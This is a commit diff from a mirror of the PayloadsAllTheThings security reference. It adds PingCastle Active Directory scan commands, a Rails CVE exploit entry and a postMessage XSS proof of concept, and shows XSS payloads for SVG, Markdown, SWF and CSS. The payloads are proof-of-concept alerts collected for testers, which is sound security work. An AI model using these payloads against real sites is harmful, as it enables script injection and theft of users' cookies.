ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 10:26:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

XSS PostMessage

Browse Source
This commit is contained in:
Swissky 2019-08-03 23:22:14 +02:00
parent 9b96c7692f
commit bd449e9cea
3 changed files with 42 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Methodology and Resources/Active Directory Attack.md
View File

@ -91,6 +91,10 @@
```powershell
pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD> --advanced-live --nullsession
pingcastle.exe --healthcheck --server domain.local
pingcastle.exe --graph --server domain.local
pingcastle.exe --scanner scanner_name --server domain.local
available scanners are:aclcheck,antivirus,corruptADDatabase,foreignusers,laps_bitlocker,localadmin,ullsession,nullsession-trust,share,smb,spooler,startup
```
* [Kerbrute](https://github.com/ropnop/kerbrute)

2
README.md
View File

@ -34,7 +34,6 @@ You might also like the `Methodology and Resources` folder :
- [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
- Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
- Apache Struts 2 CVE-2017-5638.py
- Apache Struts 2 CVE-2017-9805.py
- Apache Struts 2 CVE-2018-11776.py
- Docker API RCE.py
@ -43,6 +42,7 @@ You might also like the `Methodology and Resources` folder :
- JBoss CVE-2015-7501.py
- Jenkins CVE-2015-8103.py
- Jenkins CVE-2016-0792.py
- Rails CVE-2019-5420.rb
- Shellshock CVE-2014-6271.py
- Tomcat CVE-2017-12617.py
- WebLogic CVE-2016-3510.py

45
XSS Injection/README.md
View File

@ -13,6 +13,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [XSS in HTML/Applications](#xss-in-htmlapplications)
- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
- [XSS in PostMessage](#xss-in-postmessage)
- [Blind XSS](#blind-xss)
- [XSS Hunter](#xss-hunter)
- [Other Blind XSS tools](#other-blind-xss-tools)
@ -262,7 +263,7 @@ vbscript:msgbox("XSS")
</name>
```
XSS in XML
### XSS in XML
```xml
<html>
@ -273,7 +274,7 @@ XSS in XML
</html>
```
XSS in SVG
### XSS in SVG
```xml
<?xml version="1.0" standalone="no"?>
@ -287,7 +288,7 @@ XSS in SVG
</svg>
```
XSS in SVG (short)
### XSS in SVG (short)
```javascript
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
@ -297,7 +298,7 @@ XSS in SVG (short)
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
```
XSS in Markdown
### XSS in Markdown
```csharp
[a](javascript:prompt(document.cookie))
@ -306,7 +307,7 @@ XSS in Markdown
[a](javascript:window.onerror=alert;throw%201)
```
XSS in SWF flash application
### XSS in SWF flash application
```powershell
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
@ -316,7 +317,7 @@ IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(invalidfileinvali
more payloads in ./files
XSS in SWF flash application
### XSS in SWF flash application
```
flashmediaelement.swf?jsinitfunctio%gn=alert`1`
@ -337,7 +338,7 @@ flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
```
XSS in CSS
### XSS in CSS
```html
<!DOCTYPE html>
@ -356,6 +357,33 @@ div {
</html>
```
## XSS in PostMessage
> If the target origin is asterisk * the message can be sent to any domain has reference to the child page.
```html
<html>
<body>
<input type=button value="Click Me" id="btn">
</body>
<script>
document.getElementById('btn').onclick = function(e){
window.poc = window.open('http://www.redacted.com/#login');
setTimeout(function(){
window.poc.postMessage(
{
"sender": "accounts",
"url": "javascript:confirm('XSS')",
},
'*'
);
}, 2000);
}
</script>
</html>
```
## Blind XSS
### XSS Hunter
@ -1002,6 +1030,7 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
- [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin MoulinierFollow
- [Airbnb When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett
- [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html)
- [postMessage XSS on a million sites - December 15, 2016 - Mathias Karlsson](https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/)
- [postMessage XSS Bypass](https://hackerone.com/reports/231053)
- [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin
- [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans
@ -1014,4 +1043,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
- [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/)
- [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be)
- [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)